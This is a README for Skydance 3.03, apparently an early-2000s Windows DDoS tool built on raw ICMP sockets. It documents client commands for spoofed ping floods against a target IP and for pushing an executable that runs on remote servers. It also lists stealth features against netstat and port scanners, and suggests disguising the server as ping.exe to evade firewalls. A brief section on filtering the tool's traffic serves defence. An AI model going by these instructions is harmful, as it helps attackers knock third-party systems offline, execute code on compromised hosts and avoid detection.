This is - Skydance 3.03 - by Edrin@gmx.net !
http://skd.box.sk

Disclaimer:
	Everything in this document is based on the results i got from developing skydance.
	Skydance 3.03 is an EXAMPLE of a Distributed Denial of Service attack!
	Use SKYDANCE 3.03 SOURCE AND README ON YOUR OWN RISK, i will NEVER be
	responsible for any HARM or harmfull things that happen because SKYDANCE
	source was USED! That means I do NOT guarantee for any features and
	security-thing	and i do not guarantee that this program works properly!!!
	Indeed i guarantee for nothing ;)
	Use this source only to learn about how to defend against Windows DDoS!

	suggestions against SKD303DDoS: goto ---> 4. d)

#tested only with win98 and win2k
------------------------------------------------------------------------------------------------------

Many thanks to ever who helped me developing and testing Skydance

and friendly hello to Matt, BinaryZer0, Cube, space tiger, orcist and Marvin

------------------------------------------------------------------------------------------------------
if you compile it "as it is" without changes:
#######################################
#Note: for skd303s.exe <pass> = nerv  #
#######################################

	1. What is Skydance 3?
	2. client usage:
	3. About the source code:
	4. How to filter SKD303DDoS pongs
	5. ICMP "ability" of win32 winsock (Icmps you can recv)
	6. Some words about DDoS servers that use Windows OS.


1. What is Skyance 3?

	Skydance 3.03 is a DDoS for win32 using RAW sockets.
	source includes the following features:
	- communication with ICMP, including a simple std-windows-"abcd..." ping attack
	- can not be found with netstat -a (ICMP:)
	- can not be found with usual Port-Scanners (RAW:) 
	- on win2k-systems communication and attacks are spoofed (IP_HDRINCL:) 
	- server size can be packet to 17 KB
	- client-source can be ported to unix because it is done as console app and does not make use
	  of highlevel windows api functions.
	- (ICMP tunnel) file(<65kb) can be sent within a spoofed ICMP packet, whick is executed after receive.

2. client usage:

	Usage:
	The Client will try to use a spoofed source address. You should test your
	spoofing-ability first to ensure that you can not be revealed. The test
	will fail on WinNT and Win9x/Me systems. It should not fail under Win2000.

	<spoofed-IP> and <target> must be in style of xxx.xxx.xxx.xxx
	By default the spoofed-IP is 216.32.74.55 = www.yahoo.com
	<pass> must be <= 4 letters!

	- To test spoofing-ability:
	   skd303c spoofing
	
	- Get Server Info (always unspoofed packets!):
	   skd303c <server> <pass> info
	   Example: skd303c myknight.com diva info
	
	- To attack with spoofed standart-windows-pings:
	   skd303c <server> <pass> kill <target> <time-in-minutes> <spoofed-IP>
	   Example: skd303c myknight.com diva kill 166.166.166.166 10 12.34.56.78
	   <time-in-minutes> can be up to 1440

	- To send and exectue a file with a spoofed standart-windows-pong:
	   skd303c <server> <pass> fsend <file-name> <new-filename> <spoofed-IP>
	   Example: skd303c myknight.com diva fsend c:\myfile.exe myfile.exe 98.76.54.32
	   <file-name> SIZE can be up to 6540 byte, <new-filename> can have up to 39 letters

	DO NOT HARM PEOPLE! HELP CHILDREN IN AFRICA!

	greetings, Edrin

3. About source code:

	why this source needed to be modified to abuse it:

	first of all: it is not possibel to receive ICMP_ECHOREQUESTS
	with winsock ( -> 5.) so I decided to use ICMP_ECHORESPONSE in my
	source, you can simply modify it...

	next thing: communication pong should have std unix ping size...
	(check it, Im not sure about it... 84 byte in total? (IP header 20 + ICMP 64)

	the std-windows pings are the only attack I added and
	a simple firewall would stop an attack because size of
	this std windows ping is 
	#define STANDART_PINGSIZE 60 (byte)
	There are othere DoS that are better. Anyway my win2k 
	550 MHz had 100% CPU usage in a 10 MBit local net.

	In addition to that the info function should also return
	the OS version, so it's possible to find out whether the server is 
	"spoofable" or not.

	Another lack of Skydance 3 is: I didnt crypt the 
	unsigned char cCommand;	(the command in my message-struct)
	so a sniffer would always see a k(kill), i(info) or f(file)
	at position FULL_PACKET[35 ?]
	anyway, you could use ...the first password letter... +/- xy for
	a "crypted" command. in general there is no crypto built
	in (in my opinion a crypto in a DDoS is not really necessary)
	in addition to that there is no self installing procedure built in

	And there is no self installing code in my source... blah blah

4. How to filter SKD303DDoS pongs
	As I already mentioned:
	In communication pongs:

	a) communication with unix 84-byte PONGS ! ICMP_ECHORESPONSE
	b) 'k', 'i', 'f' at position FULL_PACKET[35] or ICMP_STRUCT[15] (IPheader = 20 byte)
	c) pongs are UNSPOOFED! so trace back is possibel!
---->>	d) block each strange "ok-ICMP" in ( -> 5.) ??
	
	I don't have any other ideas, do you?

5. ICMP "ability" of win32 winsock (Icmps you can recv)
	I tested it in a few minutes, no warranty, proof it yourself!

	0 Echo reply. 				ok
	1 Reserved. 				ok
	2 Reserved. 				ok
	3 Destination unreachable. 		failed
	4 Source quench. 			failed
	5 Redirect. 				failed
	6 Alternate Host Address. 		ok
	7  					ok
	8 Echo request. 			failed	(this "would" be nice to receive)
	9 Router advertisement. 		ok
	10 Router solicitation. 		ok
	11 Time exceeded. 			failed
	12 Parameter problem. 			failed
	13 Timestamp request. 			failed
	14 Timestamp reply. 			ok
	15 Information request. 		ok
	16 Information reply. 			ok
	17 Address mask request. 		failed
	18 Address mask reply. 			ok
	19 Reserved (for security). 		ok
	20					ok
	-					  unknown
	29 Reserved (for robustness experiment).ok
	30 Traceroute. 				ok
	31 Conversion error. 			ok
	32 Mobile Host Redirect. 		ok
	33 IPv6 Where-Are-You. 			ok
	34 IPv6 I-Am-Here. 			ok
	35 Mobile Registration Request. 	ok
	36 Mobile Registration Reply. 		ok
	37 Domain Name request. 		ok
	38 Domain Name reply. 			ok
	39 SKIP Algorithm Discovery Protocol. 	ok
	40 Photuris, Security failures. 	ok
	41					ok
	-					  unknown
	255 Reserved. 				ok

6. Some words about DDoS from Windows OS.
	The new feature IP_HDRINCL that comes with win2k can make windows to a powerful
	DDoS server because it enables IP-spoofing!

	THE IP_HDRINCL
	setsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));

	That means win2k-servers can become a base for DDoS that is equal to Unix servers.

	Anyway most windows systems remain dial-in computers that have dynamic IP. That means
	such a DDoS as SKD3.03 can not be used with it in a serious way. I think for such
	Computers the most threatening DDoS remains IRC-"bots" because you can not simply
	disable an IRC server...

	Firewalls that control each winsock access are quite good. They would probably detect
	DDoS server. Anyway: Maybe you can replace ping.exe with a DDoS and maybe firewall does not
	detect a DDoS then...


Thx for reading,
Edrin@gmx.net